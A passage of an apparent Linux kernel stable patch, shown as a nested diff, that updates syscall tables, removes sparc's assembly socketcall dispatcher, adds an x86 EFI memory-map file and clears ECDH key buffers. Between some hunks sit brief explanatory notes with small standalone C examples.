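		if (sync_file_range(fd, 0, 4096, SYNC_FILE_RANGE_WRITE))
			perror("sync_file_range");
		return 0;
	}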
+diff --git a/arch/sh/kernel/syscalls/syscall.tbl b/arch/sh/kernel/syscalls/syscall.tbl
+index 2de85c977f54f..4741e5c8ac61c 100644
+--- a/arch/sh/kernel/syscalls/syscall.tbl
++++ b/arch/sh/kernel/syscalls/syscall.tbl
+@@ -321,7 +321,7 @@
+ 311	common	set_robust_list			sys_set_robust_list
+ 312	common	get_robust_list			sys_get_robust_list
+ 313	common	splice				sys_splice
+-314	common	sync_file_range			sys_sync_file_range
++314	common	sync_file_range			sys_sh_sync_file_range6
+ 315	common	tee				sys_tee
+ 316	common	vmsplice			sys_vmsplice
+ 317	common	move_pages			sys_move_pages
+@@ -395,6 +395,7 @@
+ 385	common	pkey_alloc			sys_pkey_alloc
+ 386	common	pkey_free			sys_pkey_free
+ 387	common	rseq				sys_rseq
++388	common	sync_file_range2		sys_sync_file_range2
+ # room for arch specific syscalls
+ 393	common	semget				sys_semget
+ 394	common	semctl				sys_semctl
+diff --git a/arch/sparc/kernel/sys32.S b/arch/sparc/kernel/sys32.S
+index a45f0f31fe51a..a3d308f2043e5 100644
+--- a/arch/sparc/kernel/sys32.S
++++ b/arch/sparc/kernel/sys32.S
+@@ -18,224 +18,3 @@ sys32_mmap2:
+ 	sethi		%hi(sys_mmap), %g1
+ 	jmpl		%g1 + %lo(sys_mmap), %g0
+ 	 sllx		%o5, 12, %o5
+-
+-	.align		32
+-	.globl		sys32_socketcall
+-sys32_socketcall:	/* %o0=call, %o1=args */
+-	cmp		%o0, 1
+-	bl,pn		%xcc, do_einval
+-	 cmp		%o0, 18
+-	bg,pn		%xcc, do_einval
+-	 sub		%o0, 1, %o0
+-	sllx		%o0, 5, %o0
+-	sethi		%hi(__socketcall_table_begin), %g2
+-	or		%g2, %lo(__socketcall_table_begin), %g2
+-	jmpl		%g2 + %o0, %g0
+-	 nop
+-do_einval:
+-	retl
+-	 mov		-EINVAL, %o0
+-
+-	.align		32
+-__socketcall_table_begin:
+-
+-	/* Each entry is exactly 32 bytes. */
+-do_sys_socket: /* sys_socket(int, int, int) */
+-1:	ldswa		[%o1 + 0x0] %asi, %o0
+-	sethi		%hi(sys_socket), %g1
+-2:	ldswa		[%o1 + 0x8] %asi, %o2
+-	jmpl		%g1 + %lo(sys_socket), %g0
+-3:	 ldswa		[%o1 + 0x4] %asi, %o1
+-	nop
+-	nop
+-	nop
+-do_sys_bind: /* sys_bind(int fd, struct sockaddr *, int) */
+-4:	ldswa		[%o1 + 0x0] %asi, %o0
+-	sethi		%hi(sys_bind), %g1
+-5:	ldswa		[%o1 + 0x8] %asi, %o2
+-	jmpl		%g1 + %lo(sys_bind), %g0
+-6:	 lduwa		[%o1 + 0x4] %asi, %o1
+-	nop
+-	nop
+-	nop
+-do_sys_connect: /* sys_connect(int, struct sockaddr *, int) */
+-7:	ldswa		[%o1 + 0x0] %asi, %o0
+-	sethi		%hi(sys_connect), %g1
+-8:	ldswa		[%o1 + 0x8] %asi, %o2
+-	jmpl		%g1 + %lo(sys_connect), %g0
+-9:	 lduwa		[%o1 + 0x4] %asi, %o1
+-	nop
+-	nop
+-	nop
+-do_sys_listen: /* sys_listen(int, int) */
+-10:	ldswa		[%o1 + 0x0] %asi, %o0
+-	sethi		%hi(sys_listen), %g1
+-	jmpl		%g1 + %lo(sys_listen), %g0
+-11:	 ldswa		[%o1 + 0x4] %asi, %o1
+-	nop
+-	nop
+-	nop
+-	nop
+-do_sys_accept: /* sys_accept(int, struct sockaddr *, int *) */
+-12:	ldswa		[%o1 + 0x0] %asi, %o0
+-	sethi		%hi(sys_accept), %g1
+-13:	lduwa		[%o1 + 0x8] %asi, %o2
+-	jmpl		%g1 + %lo(sys_accept), %g0
+-14:	 lduwa		[%o1 + 0x4] %asi, %o1
+-	nop
+-	nop
+-	nop
+-do_sys_getsockname: /* sys_getsockname(int, struct sockaddr *, int *) */
+-15:	ldswa		[%o1 + 0x0] %asi, %o0
+-	sethi		%hi(sys_getsockname), %g1
+-16:	lduwa		[%o1 + 0x8] %asi, %o2
+-	jmpl		%g1 + %lo(sys_getsockname), %g0
+-17:	 lduwa		[%o1 + 0x4] %asi, %o1
+-	nop
+-	nop
+-	nop
+-do_sys_getpeername: /* sys_getpeername(int, struct sockaddr *, int *) */
+-18:	ldswa		[%o1 + 0x0] %asi, %o0
+-	sethi		%hi(sys_getpeername), %g1
+-19:	lduwa		[%o1 + 0x8] %asi, %o2
+-	jmpl		%g1 + %lo(sys_getpeername), %g0
+-20:	 lduwa		[%o1 + 0x4] %asi, %o1
+-	nop
+-	nop
+-	nop
+-do_sys_socketpair: /* sys_socketpair(int, int, int, int *) */
+-21:	ldswa		[%o1 + 0x0] %asi, %o0
+-	sethi		%hi(sys_socketpair), %g1
+-22:	ldswa		[%o1 + 0x8] %asi, %o2
+-23:	lduwa		[%o1 + 0xc] %asi, %o3
+-	jmpl		%g1 + %lo(sys_socketpair), %g0
+-24:	 ldswa		[%o1 + 0x4] %asi, %o1
+-	nop
+-	nop
+-do_sys_send: /* sys_send(int, void *, size_t, unsigned int) */
+-25:	ldswa		[%o1 + 0x0] %asi, %o0
+-	sethi		%hi(sys_send), %g1
+-26:	lduwa		[%o1 + 0x8] %asi, %o2
+-27:	lduwa		[%o1 + 0xc] %asi, %o3
+-	jmpl		%g1 + %lo(sys_send), %g0
+-28:	 lduwa		[%o1 + 0x4] %asi, %o1
+-	nop
+-	nop
+-do_sys_recv: /* sys_recv(int, void *, size_t, unsigned int) */
+-29:	ldswa		[%o1 + 0x0] %asi, %o0
+-	sethi		%hi(sys_recv), %g1
+-30:	lduwa		[%o1 + 0x8] %asi, %o2
+-31:	lduwa		[%o1 + 0xc] %asi, %o3
+-	jmpl		%g1 + %lo(sys_recv), %g0
+-32:	 lduwa		[%o1 + 0x4] %asi, %o1
+-	nop
+-	nop
+-do_sys_sendto: /* sys_sendto(int, u32, compat_size_t, unsigned int, u32, int) */
+-33:	ldswa		[%o1 + 0x0] %asi, %o0
+-	sethi		%hi(sys_sendto), %g1
+-34:	lduwa		[%o1 + 0x8] %asi, %o2
+-35:	lduwa		[%o1 + 0xc] %asi, %o3
+-36:	lduwa		[%o1 + 0x10] %asi, %o4
+-37:	ldswa		[%o1 + 0x14] %asi, %o5
+-	jmpl		%g1 + %lo(sys_sendto), %g0
+-38:	 lduwa		[%o1 + 0x4] %asi, %o1
+-do_sys_recvfrom: /* sys_recvfrom(int, u32, compat_size_t, unsigned int, u32, u32) */
+-39:	ldswa		[%o1 + 0x0] %asi, %o0
+-	sethi		%hi(sys_recvfrom), %g1
+-40:	lduwa		[%o1 + 0x8] %asi, %o2
+-41:	lduwa		[%o1 + 0xc] %asi, %o3
+-42:	lduwa		[%o1 + 0x10] %asi, %o4
+-43:	lduwa		[%o1 + 0x14] %asi, %o5
+-	jmpl		%g1 + %lo(sys_recvfrom), %g0
+-44:	 lduwa		[%o1 + 0x4] %asi, %o1
+-do_sys_shutdown: /* sys_shutdown(int, int) */
+-45:	ldswa		[%o1 + 0x0] %asi, %o0
+-	sethi		%hi(sys_shutdown), %g1
+-	jmpl		%g1 + %lo(sys_shutdown), %g0
+-46:	 ldswa		[%o1 + 0x4] %asi, %o1
+-	nop
+-	nop
+-	nop
+-	nop
+-do_sys_setsockopt: /* sys_setsockopt(int, int, int, char *, int) */
+-47:	ldswa		[%o1 + 0x0] %asi, %o0
+-	sethi		%hi(sys_setsockopt), %g1
+-48:	ldswa		[%o1 + 0x8] %asi, %o2
+-49:	lduwa		[%o1 + 0xc] %asi, %o3
+-50:	ldswa		[%o1 + 0x10] %asi, %o4
+-	jmpl		%g1 + %lo(sys_setsockopt), %g0
+-51:	 ldswa		[%o1 + 0x4] %asi, %o1
+-	nop
+-do_sys_getsockopt: /* sys_getsockopt(int, int, int, u32, u32) */
+-52:	ldswa		[%o1 + 0x0] %asi, %o0
+-	sethi		%hi(sys_getsockopt), %g1
+-53:	ldswa		[%o1 + 0x8] %asi, %o2
+-54:	lduwa		[%o1 + 0xc] %asi, %o3
+-55:	lduwa		[%o1 + 0x10] %asi, %o4
+-	jmpl		%g1 + %lo(sys_getsockopt), %g0
+-56:	 ldswa		[%o1 + 0x4] %asi, %o1
+-	nop
+-do_sys_sendmsg: /* compat_sys_sendmsg(int, struct compat_msghdr *, unsigned int) */
+-57:	ldswa		[%o1 + 0x0] %asi, %o0
+-	sethi		%hi(compat_sys_sendmsg), %g1
+-58:	lduwa		[%o1 + 0x8] %asi, %o2
+-	jmpl		%g1 + %lo(compat_sys_sendmsg), %g0
+-59:	 lduwa		[%o1 + 0x4] %asi, %o1
+-	nop
+-	nop
+-	nop
+-do_sys_recvmsg: /* compat_sys_recvmsg(int, struct compat_msghdr *, unsigned int) */
+-60:	ldswa		[%o1 + 0x0] %asi, %o0
+-	sethi		%hi(compat_sys_recvmsg), %g1
+-61:	lduwa		[%o1 + 0x8] %asi, %o2
+-	jmpl		%g1 + %lo(compat_sys_recvmsg), %g0
+-62:	 lduwa		[%o1 + 0x4] %asi, %o1
+-	nop
+-	nop
+-	nop
+-do_sys_accept4: /* sys_accept4(int, struct sockaddr *, int *, int) */
+-63:	ldswa		[%o1 + 0x0] %asi, %o0
+-	sethi		%hi(sys_accept4), %g1
+-64:	lduwa		[%o1 + 0x8] %asi, %o2
+-65:	ldswa		[%o1 + 0xc] %asi, %o3
+-	jmpl		%g1 + %lo(sys_accept4), %g0
+-66:	 lduwa		[%o1 + 0x4] %asi, %o1
+-	nop
+-	nop
+-
+-	.section	__ex_table,"a"
+-	.align		4
+-	.word		1b, __retl_efault, 2b, __retl_efault
+-	.word		3b, __retl_efault, 4b, __retl_efault
+-	.word		5b, __retl_efault, 6b, __retl_efault
+-	.word		7b, __retl_efault, 8b, __retl_efault
+-	.word		9b, __retl_efault, 10b, __retl_efault
+-	.word		11b, __retl_efault, 12b, __retl_efault
+-	.word		13b, __retl_efault, 14b, __retl_efault
+-	.word		15b, __retl_efault, 16b, __retl_efault
+-	.word		17b, __retl_efault, 18b, __retl_efault
+-	.word		19b, __retl_efault, 20b, __retl_efault
+-	.word		21b, __retl_efault, 22b, __retl_efault
+-	.word		23b, __retl_efault, 24b, __retl_efault
+-	.word		25b, __retl_efault, 26b, __retl_efault
+-	.word		27b, __retl_efault, 28b, __retl_efault
+-	.word		29b, __retl_efault, 30b, __retl_efault
+-	.word		31b, __retl_efault, 32b, __retl_efault
+-	.word		33b, __retl_efault, 34b, __retl_efault
+-	.word		35b, __retl_efault, 36b, __retl_efault
+-	.word		37b, __retl_efault, 38b, __retl_efault
+-	.word		39b, __retl_efault, 40b, __retl_efault
+-	.word		41b, __retl_efault, 42b, __retl_efault
+-	.word		43b, __retl_efault, 44b, __retl_efault
+-	.word		45b, __retl_efault, 46b, __retl_efault
+-	.word		47b, __retl_efault, 48b, __retl_efault
+-	.word		49b, __retl_efault, 50b, __retl_efault
+-	.word		51b, __retl_efault, 52b, __retl_efault
+-	.word		53b, __retl_efault, 54b, __retl_efault
+-	.word		55b, __retl_efault, 56b, __retl_efault
+-	.word		57b, __retl_efault, 58b, __retl_efault
+-	.word		59b, __retl_efault, 60b, __retl_efault
+-	.word		61b, __retl_efault, 62b, __retl_efault
+-	.word		63b, __retl_efault, 64b, __retl_efault
+-	.word		65b, __retl_efault, 66b, __retl_efault
+-	.previous
+diff --git a/arch/sparc/kernel/syscalls/syscall.tbl b/arch/sparc/kernel/syscalls/syscall.tbl
+index 4398cc6fb68dd..0ddddd3e38c08 100644
+--- a/arch/sparc/kernel/syscalls/syscall.tbl
++++ b/arch/sparc/kernel/syscalls/syscall.tbl
+@@ -117,7 +117,7 @@
+ 90	common	dup2			sys_dup2
+ 91	32	setfsuid32		sys_setfsuid
+ 92	common	fcntl			sys_fcntl			compat_sys_fcntl
+-93	common	select			sys_select
++93	common	select			sys_select			compat_sys_select
+ 94	32	setfsgid32		sys_setfsgid
+ 95	common	fsync			sys_fsync
+ 96	common	setpriority		sys_setpriority
+@@ -155,7 +155,7 @@
+ 123	32	fchown			sys_fchown16
+ 123	64	fchown			sys_fchown
+ 124	common	fchmod			sys_fchmod
+-125	common	recvfrom		sys_recvfrom
++125	common	recvfrom		sys_recvfrom			compat_sys_recvfrom
+ 126	32	setreuid		sys_setreuid16
+ 126	64	setreuid		sys_setreuid
+ 127	32	setregid		sys_setregid16
+@@ -247,7 +247,7 @@
+ 204	32	readdir			sys_old_readdir			compat_sys_old_readdir
+ 204	64	readdir			sys_nis_syscall
+ 205	common	readahead		sys_readahead			compat_sys_readahead
+-206	common	socketcall		sys_socketcall			sys32_socketcall
++206	common	socketcall		sys_socketcall			compat_sys_socketcall
+ 207	common	syslog			sys_syslog
+ 208	common	lookup_dcookie		sys_lookup_dcookie		compat_sys_lookup_dcookie
+ 209	common	fadvise64		sys_fadvise64			compat_sys_fadvise64
+@@ -461,7 +461,7 @@
+ 412	32	utimensat_time64		sys_utimensat			sys_utimensat
+ 413	32	pselect6_time64			sys_pselect6			compat_sys_pselect6_time64
+ 414	32	ppoll_time64			sys_ppoll			compat_sys_ppoll_time64
+-416	32	io_pgetevents_time64		sys_io_pgetevents		sys_io_pgetevents
++416	32	io_pgetevents_time64		sys_io_pgetevents		compat_sys_io_pgetevents_time64
+ 417	32	recvmmsg_time64			sys_recvmmsg			compat_sys_recvmmsg_time64
+ 418	32	mq_timedsend_time64		sys_mq_timedsend		sys_mq_timedsend
+ 419	32	mq_timedreceive_time64		sys_mq_timedreceive		sys_mq_timedreceive
+diff --git a/arch/x86/entry/syscalls/syscall_32.tbl b/arch/x86/entry/syscalls/syscall_32.tbl
+index 320480a8db4f8..81e60b37128fd 100644
+--- a/arch/x86/entry/syscalls/syscall_32.tbl
++++ b/arch/x86/entry/syscalls/syscall_32.tbl
+@@ -420,7 +420,7 @@
+ 412	i386	utimensat_time64	sys_utimensat
+ 413	i386	pselect6_time64		sys_pselect6			compat_sys_pselect6_time64
+ 414	i386	ppoll_time64		sys_ppoll			compat_sys_ppoll_time64
+-416	i386	io_pgetevents_time64	sys_io_pgetevents
++416	i386	io_pgetevents_time64	sys_io_pgetevents		compat_sys_io_pgetevents_time64
+ 417	i386	recvmmsg_time64		sys_recvmmsg			compat_sys_recvmmsg_time64
+ 418	i386	mq_timedsend_time64	sys_mq_timedsend
+ 419	i386	mq_timedreceive_time64	sys_mq_timedreceive
+diff --git a/arch/x86/include/asm/efi.h b/arch/x86/include/asm/efi.h
+index e601264b1a243..5f1ff78cf5e3f 100644
+--- a/arch/x86/include/asm/efi.h
++++ b/arch/x86/include/asm/efi.h
+@@ -416,6 +416,17 @@ static inline void efi_fake_memmap_early(void)
+ }
+ #endif
+ 
++extern int __init efi_memmap_alloc(unsigned int num_entries,
++				   struct efi_memory_map_data *data);
++extern void __efi_memmap_free(u64 phys, unsigned long size,
++			      unsigned long flags);
++
++extern int __init efi_memmap_install(struct efi_memory_map_data *data);
++extern int __init efi_memmap_split_count(efi_memory_desc_t *md,
++					 struct range *range);
++extern void __init efi_memmap_insert(struct efi_memory_map *old_memmap,
++				     void *buf, struct efi_mem_range *mem);
++
+ #define arch_ima_efi_boot_mode	\
+ 	({ extern struct boot_params boot_params; boot_params.secure_boot; })
+ 
+diff --git a/arch/x86/include/asm/entry-common.h b/arch/x86/include/asm/entry-common.h
+index ffe72790ceafd..ebdf5c97f53a8 100644
+--- a/arch/x86/include/asm/entry-common.h
++++ b/arch/x86/include/asm/entry-common.h
+@@ -73,19 +73,16 @@ static inline void arch_exit_to_user_mode_prepare(struct pt_regs *regs,
+ #endif
+ 
+ 	/*
+-	 * Ultimately, this value will get limited by KSTACK_OFFSET_MAX(),
+-	 * but not enough for x86 stack utilization comfort. To keep
+-	 * reasonable stack head room, reduce the maximum offset to 8 bits.
+-	 *
+-	 * The actual entropy will be further reduced by the compiler when
+-	 * applying stack alignment constraints (see cc_stack_align4/8 in
++	 * This value will get limited by KSTACK_OFFSET_MAX(), which is 10
++	 * bits. The actual entropy will be further reduced by the compiler
++	 * when applying stack alignment constraints (see cc_stack_align4/8 in
+ 	 * arch/x86/Makefile), which will remove the 3 (x86_64) or 2 (ia32)
+ 	 * low bits from any entropy chosen here.
+ 	 *
+-	 * Therefore, final stack offset entropy will be 5 (x86_64) or
+-	 * 6 (ia32) bits.
++	 * Therefore, final stack offset entropy will be 7 (x86_64) or
++	 * 8 (ia32) bits.
+ 	 */
+-	choose_random_kstack_offset(rdtsc() & 0xFF);
++	choose_random_kstack_offset(rdtsc());
+ }
+ #define arch_exit_to_user_mode_prepare arch_exit_to_user_mode_prepare
+ 
+diff --git a/arch/x86/kernel/fpu/core.c b/arch/x86/kernel/fpu/core.c
+index 1d190761d00fd..f1446f532b17b 100644
+--- a/arch/x86/kernel/fpu/core.c
++++ b/arch/x86/kernel/fpu/core.c
+@@ -145,8 +145,8 @@ void restore_fpregs_from_fpstate(struct fpstate *fpstate, u64 mask)
+ 		asm volatile(
+ 			"fnclex\n\t"
+ 			"emms\n\t"
+-			"fildl %P[addr]"	/* set F?P to defined value */
+-			: : [addr] "m" (fpstate));
++			"fildl %[addr]"	/* set F?P to defined value */
++			: : [addr] "m" (*fpstate));
+ 	}
+ 
+ 	if (use_xsave()) {
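The subtle bit in the fildl change above: with "m" (fpstate) the memory operand
is the pointer variable itself, while "m" (*fpstate) makes it the memory the
pointer refers to, which is what the load needs. A minimal x86 illustration of
the same distinction (standalone sketch, not the FPU code path):

	#include <stdio.h>

	int main(void)
	{
		int v = 42, out;
		int *p = &v;

		/* the operand is *p, so the asm reads v, not the pointer's bytes */
		asm volatile("movl %[addr], %[out]"
			     : [out] "=r" (out)
			     : [addr] "m" (*p));
		printf("%d\n", out);	/* prints 42 */
		return 0;
	}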
+diff --git a/arch/x86/kernel/time.c b/arch/x86/kernel/time.c
+index e42faa792c079..52e1f3f0b361c 100644
+--- a/arch/x86/kernel/time.c
++++ b/arch/x86/kernel/time.c
+@@ -27,25 +27,7 @@
+ 
+ unsigned long profile_pc(struct pt_regs *regs)
+ {
+-	unsigned long pc = instruction_pointer(regs);
+-
+-	if (!user_mode(regs) && in_lock_functions(pc)) {
+-#ifdef CONFIG_FRAME_POINTER
+-		return *(unsigned long *)(regs->bp + sizeof(long));
+-#else
+-		unsigned long *sp = (unsigned long *)regs->sp;
+-		/*
+-		 * Return address is either directly at stack pointer
+-		 * or above a saved flags. Eflags has bits 22-31 zero,
+-		 * kernel addresses don't.
+-		 */
+-		if (sp[0] >> 22)
+-			return sp[0];
+-		if (sp[1] >> 22)
+-			return sp[1];
+-#endif
+-	}
+-	return pc;
++	return instruction_pointer(regs);
+ }
+ EXPORT_SYMBOL(profile_pc);
+ 
+diff --git a/arch/x86/platform/efi/Makefile b/arch/x86/platform/efi/Makefile
+index a502451576859..4bd708c037e10 100644
+--- a/arch/x86/platform/efi/Makefile
++++ b/arch/x86/platform/efi/Makefile
+@@ -2,5 +2,6 @@
+ KASAN_SANITIZE := n
+ GCOV_PROFILE := n
+ 
+-obj-$(CONFIG_EFI) 		+= quirks.o efi.o efi_$(BITS).o efi_stub_$(BITS).o
++obj-$(CONFIG_EFI) 		+= memmap.o quirks.o efi.o efi_$(BITS).o \
++				   efi_stub_$(BITS).o
+ obj-$(CONFIG_EFI_MIXED)		+= efi_thunk_$(BITS).o
+diff --git a/arch/x86/platform/efi/efi.c b/arch/x86/platform/efi/efi.c
+index ebc98a68c4005..7e51c14a1ef06 100644
+--- a/arch/x86/platform/efi/efi.c
++++ b/arch/x86/platform/efi/efi.c
+@@ -214,9 +214,11 @@ int __init efi_memblock_x86_reserve_range(void)
+ 	data.desc_size		= e->efi_memdesc_size;
+ 	data.desc_version	= e->efi_memdesc_version;
+ 
+-	rv = efi_memmap_init_early(&data);
+-	if (rv)
+-		return rv;
++	if (!efi_enabled(EFI_PARAVIRT)) {
++		rv = efi_memmap_init_early(&data);
++		if (rv)
++			return rv;
++	}
+ 
+ 	if (add_efi_memmap || do_efi_soft_reserve())
+ 		do_add_efi_memmap();
+diff --git a/arch/x86/platform/efi/memmap.c b/arch/x86/platform/efi/memmap.c
+new file mode 100644
+index 0000000000000..93baffd443fea
+--- /dev/null
++++ b/arch/x86/platform/efi/memmap.c
+@@ -0,0 +1,249 @@
++// SPDX-License-Identifier: GPL-2.0
++/*
++ * Common EFI memory map functions.
++ */
++
++#define pr_fmt(fmt) "efi: " fmt
++
++#include <linux/init.h>
++#include <linux/kernel.h>
++#include <linux/efi.h>
++#include <linux/io.h>
++#include <asm/early_ioremap.h>
++#include <asm/efi.h>
++#include <linux/memblock.h>
++#include <linux/slab.h>
++
++static phys_addr_t __init __efi_memmap_alloc_early(unsigned long size)
++{
++	return memblock_phys_alloc(size, SMP_CACHE_BYTES);
++}
++
++static phys_addr_t __init __efi_memmap_alloc_late(unsigned long size)
++{
++	unsigned int order = get_order(size);
++	struct page *p = alloc_pages(GFP_KERNEL, order);
++
++	if (!p)
++		return 0;
++
++	return PFN_PHYS(page_to_pfn(p));
++}
++
++void __init __efi_memmap_free(u64 phys, unsigned long size, unsigned long flags)
++{
++	if (flags & EFI_MEMMAP_MEMBLOCK) {
++		if (slab_is_available())
++			memblock_free_late(phys, size);
++		else
++			memblock_phys_free(phys, size);
++	} else if (flags & EFI_MEMMAP_SLAB) {
++		struct page *p = pfn_to_page(PHYS_PFN(phys));
++		unsigned int order = get_order(size);
++
++		free_pages((unsigned long) page_address(p), order);
++	}
++}
++
++/**
++ * efi_memmap_alloc - Allocate memory for the EFI memory map
++ * @num_entries: Number of entries in the allocated map.
++ * @data: efi memmap installation parameters
++ *
++ * Depending on whether mm_init() has already been invoked or not,
++ * either memblock or "normal" page allocation is used.
++ *
++ * Returns zero on success, a negative error code on failure.
++ */
++int __init efi_memmap_alloc(unsigned int num_entries,
++		struct efi_memory_map_data *data)
++{
++	/* Expect allocation parameters are zero initialized */
++	WARN_ON(data->phys_map || data->size);
++
++	data->size = num_entries * efi.memmap.desc_size;
++	data->desc_version = efi.memmap.desc_version;
++	data->desc_size = efi.memmap.desc_size;
++	data->flags &= ~(EFI_MEMMAP_SLAB | EFI_MEMMAP_MEMBLOCK);
++	data->flags |= efi.memmap.flags & EFI_MEMMAP_LATE;
++
++	if (slab_is_available()) {
++		data->flags |= EFI_MEMMAP_SLAB;
++		data->phys_map = __efi_memmap_alloc_late(data->size);
++	} else {
++		data->flags |= EFI_MEMMAP_MEMBLOCK;
++		data->phys_map = __efi_memmap_alloc_early(data->size);
++	}
++
++	if (!data->phys_map)
++		return -ENOMEM;
++	return 0;
++}
++
++/**
++ * efi_memmap_install - Install a new EFI memory map in efi.memmap
++ * @ctx: map allocation parameters (address, size, flags)
++ *
++ * Unlike efi_memmap_init_*(), this function does not allow the caller
++ * to switch from early to late mappings. It simply uses the existing
++ * mapping function and installs the new memmap.
++ *
++ * Returns zero on success, a negative error code on failure.
++ */
++int __init efi_memmap_install(struct efi_memory_map_data *data)
++{
++	unsigned long size = efi.memmap.desc_size * efi.memmap.nr_map;
++	unsigned long flags = efi.memmap.flags;
++	u64 phys = efi.memmap.phys_map;
++	int ret;
++
++	efi_memmap_unmap();
++
++	if (efi_enabled(EFI_PARAVIRT))
++		return 0;
++
++	ret = __efi_memmap_init(data);
++	if (ret)
++		return ret;
++
++	__efi_memmap_free(phys, size, flags);
++	return 0;
++}
++
++/**
++ * efi_memmap_split_count - Count number of additional EFI memmap entries
++ * @md: EFI memory descriptor to split
++ * @range: Address range (start, end) to split around
++ *
++ * Returns the number of additional EFI memmap entries required to
++ * accommodate @range.
++ */
++int __init efi_memmap_split_count(efi_memory_desc_t *md, struct range *range)
++{
++	u64 m_start, m_end;
++	u64 start, end;
++	int count = 0;
++
++	start = md->phys_addr;
++	end = start + (md->num_pages << EFI_PAGE_SHIFT) - 1;
++
++	/* modifying range */
++	m_start = range->start;
++	m_end = range->end;
++
++	if (m_start <= start) {
++		/* split into 2 parts */
++		if (start < m_end && m_end < end)
++			count++;
++	}
++
++	if (start < m_start && m_start < end) {
++		/* split into 3 parts */
++		if (m_end < end)
++			count += 2;
++		/* split into 2 parts */
++		if (end <= m_end)
++			count++;
++	}
++
++	return count;
++}
++
++/**
++ * efi_memmap_insert - Insert a memory region in an EFI memmap
++ * @old_memmap: The existing EFI memory map structure
++ * @buf: Address of buffer to store new map
++ * @mem: Memory map entry to insert
++ *
++ * It is suggested that you call efi_memmap_split_count() first
++ * to see how large @buf needs to be.
++ */
++void __init efi_memmap_insert(struct efi_memory_map *old_memmap, void *buf,
++			      struct efi_mem_range *mem)
++{
++	u64 m_start, m_end, m_attr;
++	efi_memory_desc_t *md;
++	u64 start, end;
++	void *old, *new;
++
++	/* modifying range */
++	m_start = mem->range.start;
++	m_end = mem->range.end;
++	m_attr = mem->attribute;
++
++	/*
++	 * The EFI memory map deals with regions in EFI_PAGE_SIZE
++	 * units. Ensure that the region described by 'mem' is aligned
++	 * correctly.
++	 */
++	if (!IS_ALIGNED(m_start, EFI_PAGE_SIZE) ||
++	    !IS_ALIGNED(m_end + 1, EFI_PAGE_SIZE)) {
++		WARN_ON(1);
++		return;
++	}
++
++	for (old = old_memmap->map, new = buf;
++	     old < old_memmap->map_end;
++	     old += old_memmap->desc_size, new += old_memmap->desc_size) {
++
++		/* copy original EFI memory descriptor */
++		memcpy(new, old, old_memmap->desc_size);
++		md = new;
++		start = md->phys_addr;
++		end = md->phys_addr + (md->num_pages << EFI_PAGE_SHIFT) - 1;
++
++		if (m_start <= start && end <= m_end)
++			md->attribute |= m_attr;
++
++		if (m_start <= start &&
++		    (start < m_end && m_end < end)) {
++			/* first part */
++			md->attribute |= m_attr;
++			md->num_pages = (m_end - md->phys_addr + 1) >>
++				EFI_PAGE_SHIFT;
++			/* latter part */
++			new += old_memmap->desc_size;
++			memcpy(new, old, old_memmap->desc_size);
++			md = new;
++			md->phys_addr = m_end + 1;
++			md->num_pages = (end - md->phys_addr + 1) >>
++				EFI_PAGE_SHIFT;
++		}
++
++		if ((start < m_start && m_start < end) && m_end < end) {
++			/* first part */
++			md->num_pages = (m_start - md->phys_addr) >>
++				EFI_PAGE_SHIFT;
++			/* middle part */
++			new += old_memmap->desc_size;
++			memcpy(new, old, old_memmap->desc_size);
++			md = new;
++			md->attribute |= m_attr;
++			md->phys_addr = m_start;
++			md->num_pages = (m_end - m_start + 1) >>
++				EFI_PAGE_SHIFT;
++			/* last part */
++			new += old_memmap->desc_size;
++			memcpy(new, old, old_memmap->desc_size);
++			md = new;
++			md->phys_addr = m_end + 1;
++			md->num_pages = (end - m_end) >>
++				EFI_PAGE_SHIFT;
++		}
++
++		if ((start < m_start && m_start < end) &&
++		    (end <= m_end)) {
++			/* first part */
++			md->num_pages = (m_start - md->phys_addr) >>
++				EFI_PAGE_SHIFT;
++			/* latter part */
++			new += old_memmap->desc_size;
++			memcpy(new, old, old_memmap->desc_size);
++			md = new;
++			md->phys_addr = m_start;
++			md->num_pages = (end - md->phys_addr + 1) >>
++				EFI_PAGE_SHIFT;
++			md->attribute |= m_attr;
++		}
++	}
++}
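The split/insert pair at the end of the new file is easiest to follow with
concrete numbers. A standalone model of efi_memmap_split_count(), using the
same inclusive-end convention (the test values are made up):

	#include <stdint.h>
	#include <stdio.h>

	static int split_count(uint64_t start, uint64_t end,
			       uint64_t m_start, uint64_t m_end)
	{
		int count = 0;

		/* range covers the head of the descriptor: 2 parts */
		if (m_start <= start && start < m_end && m_end < end)
			count++;
		if (start < m_start && m_start < end) {
			if (m_end < end)
				count += 2;	/* strictly inside: 3 parts */
			else
				count++;	/* covers the tail: 2 parts */
		}
		return count;
	}

	int main(void)
	{
		/* descriptor [0x1000, 0x4fff], carving out [0x2000, 0x2fff]:
		 * the range lands strictly inside, costing 2 extra entries */
		printf("%d\n", split_count(0x1000, 0x4fff, 0x2000, 0x2fff));
		return 0;
	}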
+diff --git a/crypto/ecdh.c b/crypto/ecdh.c
+index 80afee3234fbe..3049f147e0117 100644
+--- a/crypto/ecdh.c
++++ b/crypto/ecdh.c
+@@ -33,6 +33,8 @@ static int ecdh_set_secret(struct crypto_kpp *tfm, const void *buf,
+ 	    params.key_size > sizeof(u64) * ctx->ndigits)
+ 		return -EINVAL;
+ 
++	memset(ctx->private_key, 0, sizeof(ctx->private_key));
++
+ 	if (!params.key || !params.key_size)
+ 		return ecc_gen_privkey(ctx->curve_id, ctx->ndigits,
+ 				       ctx->private_key);
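The new memset() guards against key-material reuse: the private key lives in a
fixed-size digit array, and loading a shorter key after a longer one would
otherwise leave stale digits in the upper words. A generic sketch of the
pattern (buffer size and helper are made up; this is not the crypto API):

	#include <assert.h>
	#include <stdint.h>
	#include <string.h>

	#define NDIGITS 8

	static uint64_t private_key[NDIGITS];

	static void load_key(const void *key, size_t key_size)
	{
		memset(private_key, 0, sizeof(private_key));	/* drop stale digits */
		memcpy(private_key, key, key_size);	/* size validated by caller */
	}

	int main(void)
	{
		uint64_t longk[NDIGITS], shortk[4] = { 1, 2, 3, 4 };

		memset(longk, 0xff, sizeof(longk));
		load_key(longk, sizeof(longk));
		load_key(shortk, sizeof(shortk));	/* shorter key, same buffer */
		assert(private_key[NDIGITS - 1] == 0);	/* no leftovers from longk */
		return 0;
	}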
+diff --git a/drivers/acpi/x86/utils.c b/drivers/acpi/x86/utils.c
+index e45285d4e62a4..d0257758cf989 100644
+--- a/drivers/acpi/x86/utils.c
++++ b/drivers/acpi/x86/utils.c
+@@ -188,16 +188,16 @@ bool acpi_device_override_status(struct acpi_device *adev, unsigned long long *s
+ }
+ 
+ /*
+- * AMD systems from Renoir and Lucienne *require* that the NVME controller
++ * AMD systems from Renoir onwards *require* that the NVME controller
